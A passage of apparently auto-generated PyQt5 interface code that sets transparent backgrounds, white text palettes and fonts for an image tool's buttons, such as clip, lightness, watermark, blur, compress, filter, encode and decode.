palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_clip.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_clip.setFont(font)
self.btn_clip.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_clip.setObjectName("btn_clip")
self.verticalLayout_2.addWidget(self.btn_clip)
self.btn_lightness = QtWidgets.QToolButton(self.frame_5)
self.btn_lightness.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_lightness.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_lightness.setFont(font)
self.btn_lightness.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_lightness.setObjectName("btn_lightness")
self.verticalLayout_2.addWidget(self.btn_lightness)
self.btn_watermark = QtWidgets.QToolButton(self.frame_5)
self.btn_watermark.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_watermark.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_watermark.setFont(font)
self.btn_watermark.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_watermark.setObjectName("btn_watermark")
self.verticalLayout_2.addWidget(self.btn_watermark, 0, QtCore.Qt.AlignLeft)
self.btn_blur = QtWidgets.QToolButton(self.frame_5)
self.btn_blur.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_blur.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_blur.setFont(font)
self.btn_blur.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_blur.setObjectName("btn_blur")
self.verticalLayout_2.addWidget(self.btn_blur)
self.btn_compress = QtWidgets.QToolButton(self.frame_5)
self.btn_compress.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_compress.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_compress.setFont(font)
self.btn_compress.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_compress.setObjectName("btn_compress")
self.verticalLayout_2.addWidget(self.btn_compress)
self.btn_filter = QtWidgets.QToolButton(self.frame_5)
self.btn_filter.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_filter.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_filter.setFont(font)
self.btn_filter.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_filter.setObjectName("btn_filter")
self.verticalLayout_2.addWidget(self.btn_filter)
self.btn_encode = QtWidgets.QToolButton(self.frame_5)
self.btn_encode.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_encode.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_encode.setFont(font)
self.btn_encode.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_encode.setObjectName("btn_encode")
self.verticalLayout_2.addWidget(self.btn_encode)
self.btn_decode = QtWidgets.QToolButton(self.frame_5)
self.btn_decode.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
